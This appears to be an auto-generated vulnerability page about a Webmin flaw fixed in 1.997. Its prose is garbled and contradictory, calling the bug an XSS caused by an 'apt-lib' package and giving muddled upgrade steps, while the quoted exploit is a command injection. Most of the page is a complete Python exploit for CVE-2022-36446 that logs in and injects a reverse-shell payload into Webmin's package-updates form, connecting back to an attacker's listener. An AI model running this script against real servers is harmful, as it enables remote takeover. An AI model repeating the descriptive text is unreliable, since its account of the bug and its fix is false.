This leads to potential XSS attacks when untrusted users access Webmin interfaces with external applications. The affected command is /ui/command where / is the forward slash and ui/command is a command in Webmin's UI. This issue has been fixed in Webmin 1.997.

Webmin 1.997 contains a fix for a potential XSS attack due to a bug in apt-lib software. In Webmin before 1.997, when untrusted users access Webmin interfaces with external applications, there is a potential XSS attack due to a bug in apt-lib software.

How did we get here?

An XSS vulnerability associated with Webmin 1.997 was discovered by security researcher, Ben Murphy.

The bug in apt-lib software

Apt-lib software is an apt utility for apt-get that provides a way to download, install, upgrade and remove packages from APT repositories. It was originally written by Michael van Elst. The "apt-lib" software bug was introduced in version 0.3 of the software.

The bug in apt-lib software is a potential XSS attack due to a bug in version 0.3 of the software. A potential XSS attack occurs when untrusted users access Webmin interfaces with external applications and they use the command /ui/command where / is the forward slash and ui/command is a command in Webmin's UI. This issue has been fixed in Webmin 1.997.

Upgrade Instructions

First, upgrade to Webmin 1.997 or later.
Next, run apt-get update and apt-get dist-upgrade to install the necessary packages that were fixed in Webmin 1.997.

Upgrade and Installation

Upgrade to Webmin 1.997 and the latest version of apt-lib software:
1) Upgrade to Webmin 1.997 and the latest version of apt-lib software:
apt-get update && apt-get dist-upgrade
2)  If you are using a stable release, upgrade from any previous stable release. For example, if you're running Webmin v1.996, then you would upgrade to v2.0 as follows:
apt-get update && apt-get dist-upgrade
3) If you are not using a stable release and have been on Webmin for several years, then upgrading is required as follows:
apt-get update && apt-get dist-upgrade -t unstable

What is an XSS attack?

Cross-site scripting (XSS) is a type of computer security vulnerability that affects how user input is validated or processed. The attacker injects client-side script into an HTML document, which is executed on the server when a victim visits the page.
The flaw enables attackers to execute their own code in the context of another site or even steal cookies from other sites.

Exploit

# Exploit Title: Webmin 1.996 - Remote Code Execution (RCE) (Authenticated)
# Date: 2022-07-25
# Exploit Author: Emir Polat
# Technical analysis: https://medium.com/@emirpolat/cve-2022-36446-webmin-1-997-7a9225af3165
# Vendor Homepage: https://www.webmin.com/
# Software Link: https://www.webmin.com/download.html
# Version: < 1.997
# Tested On: Version 1.996 - Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-122-generic x86_64)
# CVE: CVE-2022-36446

import argparse
import requests
from bs4 import BeautifulSoup

def login(args):
    global session
    global sysUser

    session = requests.Session()
    loginUrl = f"{args.target}:10000/session_login.cgi"
    infoUrl = f"{args.target}:10000/sysinfo.cgi"

    username = args.username
    password = args.password
    data = {'user': username, 'pass': password}

    login = session.post(loginUrl, verify=False, data=data, cookies={'testing': '1'})
    sysInfo = session.post(infoUrl, verify=False, cookies={'sid' : session.cookies['sid']})

    bs = BeautifulSoup(sysInfo.text, 'html.parser')
    sysUser = [item["data-user"] for item in bs.find_all() if "data-user" in item.attrs]

    if sysUser:
        return True
    else:
        return False

def exploit(args):
    payload = f"""
    1337;$(python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{args.listenip}",{args.listenport}));
    os.dup2(s.fileno(),0);
    os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")');
    """

    updateUrl = f"{args.target}:10000/package-updates"
    exploitUrl = f"{args.target}:10000/package-updates/update.cgi"

    exploitData = {'mode' : 'new', 'search' : 'ssh', 'redir' : '', 'redirdesc' : '', 'u' : payload, 'confirm' : 'Install+Now'}

    if login(args):
        print("[+] Successfully Logged In !")
        print(f"[+] Session Cookie => sid={session.cookies['sid']}")
        print(f"[+] User Found  => {sysUser[0]}")

        res = session.get(updateUrl)
        bs = BeautifulSoup(res.text, 'html.parser')

        updateAccess = [item["data-module"] for item in bs.find_all() if "data-module" in item.attrs]

        if updateAccess[0] == "package-updates":
            print(f"[+] User '{sysUser[0]}' has permission to access <<Software Package Updates>>")
            print(f"[+] Exploit starting ... ")
            print(f"[+] Shell will spawn to {args.listenip} via port {args.listenport}")

            session.headers.update({'Referer'  : f'{args.target}:10000/package-updates/update.cgi?xnavigation=1'})
            session.post(exploitUrl, data=exploitData)
        else:
            print(f"[-] User '{sysUser[0]}' unfortunately hasn't permission to access <<Software Package Updates>>")
    else:
        print("[-] Login Failed !")

if __name__ == '__main__':
    parser = argparse.ArgumentParser(description="Webmin < 1.997 - Remote Code Execution (Authenticated)")
    parser.add_argument('-t', '--target', help='Target URL, Ex: https://webmin.localhost', required=True)
    parser.add_argument('-u', '--username', help='Username For Login', required=True)
    parser.add_argument('-p', '--password', help='Password For Login', required=True)
    parser.add_argument('-l', '--listenip', help='Listening address required to receive reverse shell', required=True)
    parser.add_argument('-lp','--listenport', help='Listening port required to receive reverse shell', required=True)
    parser.add_argument("-s", '--ssl', help="Use if server support SSL.", required=False)
    args = parser.parse_args()
    exploit(args)

Timeline

Published on: 07/25/2022 06:15:00 UTC
Last modified on: 08/10/2022 20:16:00 UTC

References